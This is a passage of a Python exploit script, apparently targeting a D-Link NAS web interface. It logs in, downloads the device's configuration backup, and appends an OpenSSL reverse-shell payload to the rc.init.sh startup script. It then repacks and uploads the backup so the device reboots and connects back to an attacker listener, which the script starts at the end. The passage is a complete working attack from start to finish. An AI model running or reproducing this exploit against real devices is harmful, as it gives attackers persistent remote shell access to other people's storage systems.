"cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+ args.username
+ "&pwd=&ssl_port=443&f_login_type=0&f_url="
)
else:
authBody = (
"cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+ args.username
+ "&pwd="
+ b64_url_encode(args.password)
+ "&ssl_port=443&f_login_type=0&f_url="
)
try:
# login
reqLogin = session.post(authUrl, headers=authHeaders, data=authBody)
# check if successful
reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd)
if "success" in reqCheck.text:
print("[+] Login successful")
else:
print("[!] Error during login, check credentials")
exit(1)
except Exception as error:
print(error)
print("[!] Error during login, check credentials")
exit(1)
# download backup
print("[*] Downloading backup")
if os.path.exists("backup_clean"):
os.remove("backup_clean")
# download param
downloadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
downloadHeaders = {"content-type": "application/x-www-form-urlencoded"}
downloadCmd = "cmd=cgi_backup_conf"
try:
reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd)
except Exception as error:
print(error)
print("[!] Error while downloading backup")
exit(1)
# saving to disk
try:
f = open("backup_clean", "wb")
f.write(reqBackup.content)
f.close()
if not os.path.exists("backup_clean"):
print("[!] Error while saving backup")
exit(1)
except Exception as error:
print(error)
print("[!] Error while saving backup")
exit(1)
print("[+] Download successful")
# unpack backup (tar.gz file)
try:
config = tarfile.open("backup_clean")
config.extractall()
config.close()
except Exception as error:
print(error)
print("[!] Error while unpacking backup")
exit(1)
# inject stuff into startup script
try:
bashscript = open("backup/rc.init.sh", "a")
# revshell with openssl
payload = (
"\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n"
% (args.lhost, args.lport)
)
bashscript.write(payload)
# also start a telnet deamon (has same passwd as web)
# bashscript.write("utelnetd -d")
bashscript.close()
except Exception as error:
print(error)
print("[!] Error while creating malicious backup")
exit(1)
print("[+] Created malicious backup")
# re pack file
try:
configInj = tarfile.open("backup_injected", "w:gz")
configInj.add("backup")
configInj.close()
# remove unpacked folder
shutil.rmtree("backup", ignore_errors=False, onerror=None)
except Exception as error:
print(error)
print("[!] Error while re-packing malicious backup")
exit(1)
# upload
print("[*] Uploading malicious backup")
uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
uploadHeaders = {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere"
}
configInj = open("backup_injected", "rb")
tardata = configInj.read().decode("latin-1")
uploadBody = (
'------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n'
+ tardata
+ "\r\n------WebKitFormBoundaryhellothere--\r\n"
)
reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody)
if "web/dsk_mgr/wait.html" in reqUpload.text:
print("[+] Upload successful, target will reboot now")
else:
print("[!] Error while uploading malicious backup")
exit(1)
# creating listener
print("[*] Started listener, waiting for the shell to connect back")
print("[*] When you are done kill the shell with Ctrl+C")
# random name
randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10))
# generate the cert and the key for the openssl listener
os.system(
'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null'
% (randInt, randInt)
)
# create an openssl listener
os.system(
"openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s"
% (randInt, randInt, args.lport)
)
exit(0)